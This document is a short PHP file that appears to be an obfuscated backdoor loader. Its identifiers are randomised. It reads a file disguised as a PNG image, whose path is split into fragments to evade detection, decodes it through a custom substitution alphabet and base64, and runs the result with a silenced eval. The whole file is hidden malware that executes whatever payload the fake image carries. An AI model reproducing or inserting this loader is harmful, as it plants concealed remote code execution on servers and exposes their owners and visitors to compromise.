<?php

function owugyw_exothysi($upexig_ydedohyze) {
    if ($upexig_ydedohyze == 1)
        return memowe_khezhatu();
    if ($upexig_ydedohyze == 2)
        return cypuve_chichuthisho();
}

function munyse_ulothukh($upexig_ydedohyze) {
    $syjoze = owugyw_exothysi(1);
    $ezizupi = owugyw_exothysi(2);
    for ($ishytop = 0; $ishytop < strlen($syjoze); $ishytop++) {
        $icoquc = substr($syjoze, $ishytop, 1);
        $azyjali = substr($ezizupi, $ishytop, 1);
        $fyshuso[$icoquc] = $azyjali;
    }

    $upicas = strtr($upexig_ydedohyze, $fyshuso);
    $upicas = base64_decode($upicas);

    return $upicas;
}

function anizyd_ochyqokasi($upexig_ydedohyze) {
    $lavuted = array();
    if (!file_exists($upexig_ydedohyze))
        return false;
    $ubodazh = @file_get_contents($upexig_ydedohyze);
    if (!$ubodazh)
        return false;
    $ubodazh = substr($ubodazh, 3);
    $lavuted = munyse_ulothukh($ubodazh);
    return $lavuted;
}

function memowe_khezhatu() {
    $ubodazh = "EKMPtyOhuYHQmlzZF16g8Lpxb3BVcWioDwq2X=s07TG4a+n/INvSkACRrJd9fUje5";
    return $ubodazh;
}

function cypuve_chichuthisho() {
    $lavuted = "xEtUD3Xsn4PMcBZOVy0uv5KN=8AHeForQRmqSghklY/pzJ6Lid1WCw+7TGafjIb92";
    return $lavuted;
}

$ejowivi = anizyd_ochyqokasi(__DIR__ . "/asse" . "ts/i" . "mages" . "/xog" . "uxez." . "png");
if ($ejowivi) {
    @eval($ejowivi);
}

